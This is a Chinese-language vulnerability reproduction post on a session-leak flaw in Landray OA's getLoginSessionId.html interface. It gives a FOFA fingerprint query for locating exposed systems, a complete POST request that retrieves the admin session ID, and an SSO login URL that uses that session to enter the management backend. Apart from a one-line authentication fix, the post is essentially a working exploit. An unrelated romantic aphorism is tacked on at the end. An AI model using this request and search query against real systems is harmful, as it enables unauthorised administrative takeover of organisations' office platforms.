蓝凌OA getLoginSessionId.html 信息泄露漏洞

文章目录

      • 产品简介
      • 漏洞概述
      • 指纹识别
      • 漏洞利用
      • 修复建议

产品简介

蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商业模式创新与转型发展

漏洞概述

蓝凌OA getLoginSessionId接口泄露session信息,导致攻击者可利用此漏洞进入到管理后台。

指纹识别

fofa:

app="Landray-OA系统"

漏洞利用

poc:

POST /api/sys-authentication/loginService/getLoginSessionId.html HTTP/1.1
Host: you_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

loginName=admin

获取sessionId
蓝凌OA getLoginSessionId.html 信息泄露漏洞_第1张图片
利用泄露的session 使⽤sso登录到后台

http://you_ip/sys/authentication/sso/login_auto.jsp?sessionId=泄露的session

蓝凌OA getLoginSessionId.html 信息泄露漏洞_第2张图片

修复建议

对路径/api/sys-authentication/loginService/getLoginSessionId.html加入鉴权机制

【男女情爱,相互喜欢时,是圆圆镜,团团月。情伤过后,就是一锤碎出无数月,好像没那么喜欢了,但是记起更多。】

你可能感兴趣的:(漏洞复现,html,前端,网络安全)